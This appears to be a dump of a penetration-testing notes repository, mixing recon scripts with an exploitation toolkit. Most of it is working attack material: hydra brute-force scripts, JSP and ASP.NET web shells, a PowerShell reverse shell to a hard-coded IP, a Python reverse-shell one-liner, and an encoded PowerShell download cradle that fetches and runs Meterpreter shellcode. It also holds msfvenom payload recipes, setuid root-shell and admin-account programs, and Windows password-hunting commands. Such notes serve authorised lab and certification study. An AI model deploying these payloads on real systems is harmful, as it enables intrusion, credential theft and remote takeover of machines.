echo "##################################################" 5 | host $strip 6 | echo "##################################################" 7 | echo "" 8 | masscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee $strip_scan 9 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/dirbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import os 5 | import subprocess 6 | 7 | if len(sys.argv) != 3: 8 | print "Usage: dirbust.py " 9 | sys.exit(0) 10 | 11 | url = str(sys.argv[1]) 12 | name = str(sys.argv[2]) 13 | folders = ["/usr/share/dirb/wordlists", "/usr/share/dirb/wordlists/vulns"] 14 | 15 | found = [] 16 | print "INFO: Starting dirb scan for " + url 17 | for folder in folders: 18 | for filename in os.listdir(folder): 19 | 20 | outfile = " -o " + "results/exam/" + name + "_dirb_" + filename 21 | DIRBSCAN = "dirb %s %s/%s %s -S -r" % (url, folder, filename, outfile) 22 | try: 23 | results = subprocess.check_output(DIRBSCAN, shell=True) 24 | resultarr = results.split("\n") 25 | for line in resultarr: 26 | if "+" in line: 27 | if line not in found: 28 | found.append(line) 29 | except: 30 | pass 31 | 32 | try: 33 | if found[0] != "": 34 | print "[*] Dirb found the following items..." 35 | for item in found: 36 | print " " + item 37 | except: 38 | print "INFO: No items found during dirb scan of " + url 39 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/dnsrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: dnsrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1] 10 | HOSTNAME = "nmblookup -A %s | grep '<00>' | grep -v '' | cut -d' ' -f1" % (ip_address)# grab the hostname 11 | host = subprocess.check_output(HOSTNAME, shell=True).strip() 12 | print "INFO: Attempting Domain Transfer on " + host 13 | ZT = "dig @%s.thinc.local thinc.local axfr" % (host) 14 | ztresults = subprocess.check_output(ZT, shell=True) 15 | if "failed" in ztresults: 16 | print "INFO: Zone Transfer failed for " + host 17 | else: 18 | print "[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! [see output file]" 19 | outfile = "results/exam/" + ip_address+ "_zonetransfer.txt" 20 | dnsf = open(outfile, "w") 21 | dnsf.write(ztresults) 22 | dnsf.close 23 | 24 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/ftprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import os 5 | 6 | if len(sys.argv) != 3: 7 | print "Usage: ftprecon.py " 8 | sys.exit(0) 9 | 10 | ip_address = sys.argv[1].strip() 11 | port = sys.argv[2].strip() 12 | print "INFO: Performing nmap FTP script scan for " + ip_address + ":" + port 13 | FTPSCAN = "nmap -sV -Pn -vv -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '/root/scripts/recon_enum/results/exam/%s_ftp.nmap' %s" % (port, ip_address, ip_address) 14 | results = subprocess.check_output(FTPSCAN, shell=True) 15 | outfile = "results/exam/" + ip_address + "_ftprecon.txt" 16 | f = open(outfile, "w") 17 | f.write(results) 18 | f.close 19 | 20 | print "INFO: Performing hydra ftp scan against " + ip_address 21 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_ftphydra.txt -u %s -s %s ftp" % (ip_address, ip_address, port) 22 | results = subprocess.check_output(HYDRA, shell=True) 23 | resultarr = results.split("\n") 24 | for result in resultarr: 25 | if "login:" in result: 26 | print "[*] Valid ftp credentials found: " + result 27 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/readme.txt: -------------------------------------------------------------------------------- 1 | This readme file pertains to the reconscan.py script and all associated scripts. 2 | 3 | Currently these scripts include: 4 | reconscan.py (main) 5 | dirbust.py 6 | dnsrecon.py 7 | ftprecon.py 8 | reconscan.py 9 | smbrecon.py 10 | smtprecon.py 11 | snmprecon.py 12 | sshrecon.py 13 | 14 | This collection of scripts is intended to be executed remotely against a list of IPs to enumerate discovered 15 | services such as smb, smtp, snmp, ftp and other. 16 | 17 | Author: 18 | Mike Czumak (T_v3rn1x) -- @SecuritySift 19 | 20 | How to use: 21 | reconscan.py is the main script which calls all other scripts. Simply run it and it should do the work for you. 22 | Since I wrote this for a very specific use case I hard-coded all paths so be sure you change them accordingly. 23 | You'll also need to check the directories used for writing and modify accordingly as well. I intentionally kept 24 | these scripts modular so that each script could also be run on its own. 25 | 26 | Warning: 27 | These scripts comes as-is with no promise of functionality or accuracy. I strictly wrote them for personal use 28 | I have no plans to maintain updates, I did not write them to be efficient and in some cases you may find the 29 | functions may not produce the desired results so use at your own risk/discretion. I wrote these scripts to 30 | target machines in a lab environment so please only use them against systems for which you have permission!! 31 | 32 | Modification, Distribution, and Attribution: 33 | You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 34 | author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 35 | worth anything anyway :) 36 | 37 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/smbrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import subprocess 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: smbrecon.py " 7 | sys.exit(0) 8 | 9 | ip = sys.argv[1] 10 | NBTSCAN = "python samrdump.py %s" % (ip) 11 | nbtresults = subprocess.check_output(NBTSCAN, shell=True) 12 | if ("Connection refused" not in nbtresults) and ("Connect error" not in nbtresults) and ("Connection reset" not in nbtresults): 13 | print "[*] SAMRDUMP User accounts/domains found on " + ip 14 | lines = nbtresults.split("\n") 15 | for line in lines: 16 | if ("Found" in line) or (" . " in line): 17 | print " [+] " + line 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/smtprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | import subprocess 5 | 6 | if len(sys.argv) != 2: 7 | print "Usage: smtprecon.py " 8 | sys.exit(0) 9 | 10 | #SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1]) 11 | #results = subprocess.check_output(SMTPSCAN, shell=True) 12 | 13 | #f = open("results/smtpnmapresults.txt", "a") 14 | #f.write(results) 15 | #f.close 16 | 17 | 18 | print "INFO: Trying SMTP Enum on " + sys.argv[1] 19 | names = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r') 20 | for name in names: 21 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | connect=s.connect((sys.argv[1],25)) 23 | banner=s.recv(1024) 24 | s.send('HELO test@test.org \r\n') 25 | result= s.recv(1024) 26 | s.send('VRFY ' + name.strip() + '\r\n') 27 | result=s.recv(1024) 28 | if ("not implemented" in result) or ("disallowed" in result): 29 | sys.exit("INFO: VRFY Command not implemented on " + sys.argv[1]) 30 | if (("250" in result) or ("252" in result) and ("Cannot VRFY" not in result)): 31 | print "[*] SMTP VRFY Account found on " + sys.argv[1] + ": " + name.strip() 32 | s.close() 33 | 34 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/snmprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: snmprecon.py " 7 | sys.exit(0) 8 | 9 | snmpdetect = 0 10 | ip_address = sys.argv[1] 11 | 12 | ONESIXONESCAN = "onesixtyone %s" % (ip_address) 13 | results = subprocess.check_output(ONESIXONESCAN, shell=True).strip() 14 | 15 | if results != "": 16 | if "Windows" in results: 17 | results = results.split("Software: ")[1] 18 | snmpdetect = 1 19 | elif "Linux" in results: 20 | results = results.split("[public] ")[1] 21 | snmpdetect = 1 22 | if snmpdetect == 1: 23 | print "[*] SNMP running on " + ip_address + "; OS Detect: " + results 24 | SNMPWALK = "snmpwalk -c public -v1 %s 1 > results/%s_snmpwalk.txt" % (ip_address, ip_address) 25 | results = subprocess.check_output(SNMPWALK, shell=True) 26 | 27 | NMAPSCAN = "nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes %s" % (ip_address) 28 | results = subprocess.check_output(NMAPSCAN, shell=True) 29 | resultsfile = "results/" + ip_address + "_snmprecon.txt" 30 | f = open(resultsfile, "w") 31 | f.write(results) 32 | f.close 33 | 34 | -------------------------------------------------------------------------------- /enumeration/tools/recon_scan/sshrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: sshrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1].strip() 10 | port = sys.argv[2].strip() 11 | 12 | print "INFO: Performing hydra ssh scan against " + ip_address 13 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port) 14 | try: 15 | results = subprocess.check_output(HYDRA, shell=True) 16 | resultarr = results.split("\n") 17 | for result in resultarr: 18 | if "login:" in result: 19 | print "[*] Valid ssh credentials found: " + result 20 | except: 21 | print "INFO: No valid ssh credentials found" 22 | -------------------------------------------------------------------------------- /enumeration/vulnerability_scanning.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Scanning 2 | 3 | > Vulnerability scans can generate a great deal of traffic and, in some cases, can even result in denial of service conditions on many network devices, so caution must be exercised before making use of mass vulnerability scanners on a penetration test. 4 | 5 | ## Vulnerability Scanning with Nmap 6 | 7 | - To get all available Nmap Vulnerabilities scripts 8 | 9 | ```Shell 10 | cd /usr/share/nmap/scripts/ 11 | ls -l *vuln* 12 | ``` 13 | 14 | - Then start Using one of them 15 | 16 | We will see in the output that not only did Nmap will find if the server is vulnerable; it also retrieved the admin'ʹs password hash. 17 | 18 | ```Shell 19 | nmap -v -p 80 --script=http-vuln-cve2010-2861 192.168.11.210 20 | ``` 21 | 22 | - The ftp-anon NSE script lets us quickly scan a range of IP addresses for FTP servers that allow anonymous access 23 | 24 | ```Shell 25 | nmap -v -p 21 --script=ftp-anon.nse 192.168.11.200-254 26 | ``` 27 | 28 | - we can check the security level of an SMB server with the smb-security-mode NSE scrip 29 | 30 | ```Shell 31 | nmap -v -p 139, 445 --script=smb-security-mode 192.168.11.236 32 | ``` 33 | 34 | - Beyond penetration testing, network administrators can also benefit from NSE scripts, by verifying that patches have been applied against a group of servers or workstations. 35 | 36 | For example, you can use nmap data to verify that all domain web servers have been patched against CVE-2011-319240, an Apache denial of service vulnerability. 37 | 38 | ```Shell 39 | nmap -v -p 80 --script=http-vuln-cve2011-3192 192.168.11.205-­‐210 40 | ``` 41 | 42 | - In the output above, a server was found to be to possess the denial of service vulnerability. 43 | - Nmap also provides links to various references that the user can visit for more information about the discovered vulnerability. 44 | 45 | ## The OpenVAS Vulnerability Scanner 46 | 47 | (OpenVAS) is a powerful vulnerability scanner, containing thousands of vulnerability checks. 48 | 49 | ### OpenVAS Initial Setup 50 | 51 | ```Shell 52 | # First, run the initial setup 53 | > openvas-setup 54 | # Then add user 55 | > openvas-adduser 56 | # now launch Greenbone Security Desktop and log in 57 | > gsd 58 | 59 | ``` 60 | 61 | ## More NSE Scripts 62 | 63 | `nmap -v -p 80 --script http-vuln-cve2010-2861 $IP` 64 | * checks for ColdFusion webservers with a known directory traversal vuln 65 | 66 | `nmap -v -p 80 --script all $IP` 67 | * runs all relevant vuln scripts 68 | 69 | ## OpenVAS 70 | Several steps needed before running in Kali 71 | 1. `openvas-setup` 72 | 2. https://localhost:9392 73 | 74 | * Check out scan config options for optimization 75 | -------------------------------------------------------------------------------- /enumeration/windows_enumeration.md: -------------------------------------------------------------------------------- 1 | net config Workstation 2 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 3 | hostname 4 | net users 5 | ipconfig /all 6 | route print 7 | arp -A 8 | netstat -ano 9 | netsh firewall show state 10 | netsh firewall show config 11 | schtasks /query /fo LIST /v 12 | tasklist /SVC 13 | net start 14 | DRIVERQUERY 15 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 16 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 17 | dir /s *pass* == *cred* == *vnc* == *.config* 18 | findstr /si password *.xml *.ini *.txt 19 | reg query HKLM /f password /t REG_SZ /s 20 | reg query HKCU /f password /t REG_SZ /s 21 | -------------------------------------------------------------------------------- /exploitation/643-fixed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/exploitation/643-fixed -------------------------------------------------------------------------------- /exploitation/Post-Exploitation.md: -------------------------------------------------------------------------------- 1 | # Post Exploitation 2 | 3 | ## File Transfers 4 | 5 | * can be difficult on a freshly compromised machine 6 | 7 | ### TFTP File Transfers 8 | -------------------------------------------------------------------------------- /exploitation/Public Exploits.md: -------------------------------------------------------------------------------- 1 | # Using Public Exploits 2 | 3 | * Be careful running public exploits 4 | 5 | ## Finding Exploits 6 | 7 | [SecurityFocus](http://www.securityfocus.com/vulnerabilities) 8 | 9 | ### Exploit Database 10 | 11 | [Expoit Database](https://www.exploit-db.com/) 12 | 13 | Kali contains a script to check this offline: 14 | 15 | `searchsploit slmail` 16 | 17 | ## Fixing Exploits #1 18 | 19 | 643.c 20 | 21 | 22 | ## Cross Compiling Windows executable code 23 | 24 | * use mingw32 25 | 26 | `i586-mingw32msvc-gcc 646-fixed.c -lws2_32 -o slmail-windows.exe` 27 | -------------------------------------------------------------------------------- /exploitation/computer_network_exploits.md: -------------------------------------------------------------------------------- 1 | # Computer and Network Hacker Exploits 2 | 3 | ## General Trends 4 | 5 | ### How to make money on malicious code 6 | 7 | - Sell the code for backdoors/bots 8 | - Spam and web-based advertising 9 | - Pump and dump stock schemes 10 | - Phishing: e-mail, phone, and targeted (spear) phishing 11 | - Denial of Service extortion 12 | - Keystroke loggers stealing financial information 13 | - Rent out armies of infected systems for all of the above 14 | - RAM scrapers pulling CC numbers of POS terminals 15 | 16 | ### Software Distro-Site Attacks 17 | 18 | - Hack into web and FTP sites and alter software to include backdoor ==> Everyone who downloads and uses the tool is impacted 19 | 20 | - Another approach is embodied in ISR-Evilgrade tool 21 | - Listens for software to request update 22 | - Sends response with malware 23 | - Currently includes modules for Java browser plug-ins, Winzip, WinAmp, MacOS X, OpenOffice, iTunes, Linkedln toolbar, and more More than 6o software packages in total whose Internet updates can be subverted this way 24 | 25 | ### Software Distro-Site Defenses 26 | 27 | - Check hashes across multiple mirrors 28 | - Check both MD5 and SHA-1 at least 29 | - Md5sum and sha1sum are built into Linux 30 | - Md5summer is available for free for Windows (md5summer.org) 31 | - Md5deep is another good project at http //md5deepsourceforge.net/ 32 | - Calculates MD5, SHA-;, SHA-256, Tiger, and Whirlpool hashes 33 | - Available for Win and Linux/UNIX 34 | - RIPEMD-160 35 | - Check PGP signatures if available 36 | - Make sure you check against a trustworthy key 37 | - Don’t put new software directly into production; test first 38 | 39 | --- 40 | 41 | ## Reconnaissance 42 | 43 | 44 | 45 | ### DNS and nslookup 46 | 47 | - The Domain Name System is full of useful information about a target 48 | • The attacker?s goal is to discover as many IP addresses associated with the target domain as possible 49 | • The nslookup command can be used to interact with a DNS server to get this data 50 | -------------------------------------------------------------------------------- /exploitation/downloadproxy.ps1: -------------------------------------------------------------------------------- 1 | $browser=New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX($browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"));Invoke-ShareFinder 2 | -------------------------------------------------------------------------------- /exploitation/ftp-txt: -------------------------------------------------------------------------------- 1 | Usage: ftp -v -n -s:ftp.txt 2 | 3 | echo open [---attacker IP---]> ftp.txt 4 | echo [---ftp username---]>> ftp.txt 5 | echo [---ftp password---]>> ftp.txt 6 | echo bin>> ftp.txt 7 | echo GET [---filename---]>> ftp.txt 8 | echo bye>> ftp.txt 9 | -------------------------------------------------------------------------------- /exploitation/jsp_processbuilder_shell.java: -------------------------------------------------------------------------------- 1 | 
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
 4 | String cmd = request.getParameter("cmd");
 5 | Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
 6 | InputStream in = a.getInputStream();
 7 | DataInputStream dis = new DataInputStream(in);
 8 | String disr = dis.readLine();
 9 | while ( disr != null ) {
10 | out.println(disr);
11 | disr = dis.readLine();
12 | }
13 | %>
14 |
15 | -------------------------------------------------------------------------------- /exploitation/jspb64_shell.java: -------------------------------------------------------------------------------- 1 | 
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
 4 | sun.misc.BASE64Decoder dec64 = new sun.misc.BASE64Decoder();
 5 | byte[] bc = dec64.decodeBuffer(request.getParameter("cmd"));
 6 | String sc = new String(bc, "UTF-8");
 7 | Process a =( new java.lang.ProcessBuilder(sc.toString().split("\\s"))).start();
 8 | InputStream in = a.getInputStream();
 9 | DataInputStream dis = new DataInputStream(in);
10 | String disr = dis.readLine();
11 | while ( disr != null ) {
12 | out.println(disr);
13 | disr = dis.readLine();
14 | }
15 | %>
16 |
17 | -------------------------------------------------------------------------------- /exploitation/minimum_csharp_shell.java: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%= 4 | Process.Start( 5 | new ProcessStartInfo("cmd" ,"/c " + Request["c"] ) 6 | { 7 | UseShellExecute = false, 8 | RedirectStandardOutput = true 9 | } 10 | ).StandardOutput.ReadToEnd() 11 | %> 12 | -------------------------------------------------------------------------------- /exploitation/nc_transfers.txt: -------------------------------------------------------------------------------- 1 | Push from Client to Listener 2 | On target machine: nc -lp [local port] > [outfile] 3 | On attacker machine: nc -w3 [listener IP] [listener port] < [infile] 4 | Send [infile] to listener, where it will be stored in [outfile] 5 | 6 | Pull from Listener to Client 7 | On target machine: nc -lp [local port] < [infile] 8 | On attacker machine: nc -w3 [listener IP] [listener port] > [outfile] 9 | Get [infile] from listener and store in [outfile] 10 | -------------------------------------------------------------------------------- /exploitation/powershell_to_meterpreter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # meterpreter ip & port 4 | lhost=10.10.14.xx 5 | lport=443 6 | 7 | echo " * Writing Payload" 8 | cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload 9 | echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload 10 | 11 | echo " * Prepping Command" 12 | scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')" 13 | echo $scriptblock 14 | 15 | echo 16 | echo " * Encoding command" 17 | encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`" 18 | echo $encode 19 | 20 | command="cmd.exe /c powershell.exe -Exec ByPass -Nol -Enc $encode" 21 | echo 22 | echo " * Final command" 23 | echo $command 24 | 25 | echo 26 | echo " * Starting HTTP Server to serve payload" 27 | python -m SimpleHTTPServer 28 | -------------------------------------------------------------------------------- /exploitation/reverse.ps1: -------------------------------------------------------------------------------- 1 | $client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444); 2 | $stream = $client.GetStream(); 3 | 4 | $greeting = "PS " + (pwd).Path + "> "; 5 | $sendbyte = ([text.encoding]::ASCII).GetBytes($greeting); 6 | $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); 7 | [byte[]]$bytes = 0..255|%{0}; 8 | 9 | 10 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 11 | $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 12 | $sendback = (iex $data 2>&1 | Out-String ); 13 | $sendback2 = $sendback + "PS " + (pwd).Path + "> "; 14 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 15 | $stream.Write($sendbyte,0,$sendbyte.Length); 16 | $stream.Flush() }; 17 | $client.Close(); 18 | //cat reverse.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w0 19 | //powershell -Enc payload 20 | -------------------------------------------------------------------------------- /exploitation/reverse_shell.py: -------------------------------------------------------------------------------- 1 | # Reverse shell one-liner python 2 | 3 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 4 | -------------------------------------------------------------------------------- /exploitation/reverse_shell_with_msfvenom.md: -------------------------------------------------------------------------------- 1 | ## Reverse Shell with Msfvenom - Cheatsheet 2 | 3 | ### List payloads 4 | 5 | ``` 6 | msfvenom -l 7 | ``` 8 | 9 | Or 10 | 11 | ``` 12 | msfvenom --list payloads 13 | ``` 14 | 15 | ### Generate a PHP payload 16 | 17 | ``` 18 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 19 | ``` 20 | 21 | ### Generate a Windows payload 22 | 23 | ##### Meterpreter - Reverse shell (x64): 24 | ``` 25 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 26 | ``` 27 | 28 | ##### Meterpreter - Reverse shell: 29 | ``` 30 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 31 | ``` 32 | 33 | ##### Meterpreter - Bind shell: 34 | ``` 35 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe 36 | ``` 37 | 38 | ##### CMD - Reverse shell: 39 | 40 | ``` 41 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe 42 | ``` 43 | 44 | ### Generate a Linux payload 45 | 46 | ##### Meterpreter - Reverse shell: 47 | ``` 48 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin 49 | ``` 50 | 51 | ### Generate a Python payload 52 | 53 | ``` 54 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py 55 | ``` 56 | 57 | ### Generate a WAR payload 58 | 59 | ``` 60 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war 61 | ``` 62 | 63 | ### Generate an ASP payload 64 | 65 | ``` 66 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp 67 | ``` 68 | 69 | ### Generate encoded payloads 70 | 71 | ##### Shikata\_ga\_nai 72 | ``` 73 | msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse 74 | ``` 75 | -------------------------------------------------------------------------------- /exploitation/setuid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | int main() 6 | { 7 | setuid(0); 8 | setgid(0); 9 | system( "/bin/sh -i" ); 10 | } 11 | -------------------------------------------------------------------------------- /exploitation/useradd.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() 3 | { 4 | int i; 5 | int j; 6 | i = system("net user [---username---] [---password---] /add"); 7 | j = system("net localgroup administrators [---username---] /add"); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /exploitation/wget-ps1: -------------------------------------------------------------------------------- 1 | Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 2 | 3 | Make sure to change the values for $url and $file before sending the commands 4 | 5 | echo $storageDir = $pwd > wget.ps1 6 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1 7 | echo $url = "[---URL (with filepath)---]" >> wget.ps1 8 | echo $file = "[---saved file name---]" >> wget.ps1 9 | echo $webclient.DownloadFile($url,$file) >> wget.ps1 10 | -------------------------------------------------------------------------------- /exploitation/wget-vbs: -------------------------------------------------------------------------------- 1 | Usage: cscript wget.vbs http://[URL (including file)] [filename to save to] 2 | 3 | On attacker machine: 4 | copy file to transfer to: **/var/www** 5 | start apache: **service apache2 start** 6 | 7 | 8 | 9 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 10 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 11 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 12 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 13 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 14 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 15 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 16 | echo Err.Clear >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 19 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 20 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 21 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 22 | echo http.Open "GET", strURL, False >> wget.vbs 23 | echo http.Send >> wget.vbs 24 | echo varByteArray = http.ResponseBody >> wget.vbs 25 | echo set http = Nothing >> wget.vbs 26 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 27 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 28 | echo strData = "" >> wget.vbs 29 | echo strBuffer = "" >> wget.vbs 30 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 31 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 32 | echo Next >> wget.vbs 33 | echo ts.Close >> wget.vbs 34 | -------------------------------------------------------------------------------- /exploitation/wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 14 | echo http.Open "GET", strURL, False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 24 | echo Next >> wget.vbs 25 | echo ts.Close >> wget.vbs 26 | -------------------------------------------------------------------------------- /images/33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/33.png -------------------------------------------------------------------------------- /images/34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/34.png -------------------------------------------------------------------------------- /images/35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/35.png -------------------------------------------------------------------------------- /images/36.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/36.png -------------------------------------------------------------------------------- /images/37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/37.png -------------------------------------------------------------------------------- /images/38.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/38.png -------------------------------------------------------------------------------- /images/39.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/39.png -------------------------------------------------------------------------------- /images/40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/40.png -------------------------------------------------------------------------------- /images/41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/41.png -------------------------------------------------------------------------------- /images/42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/42.png -------------------------------------------------------------------------------- /images/43.png: -------------------------------------------------------------------------------- 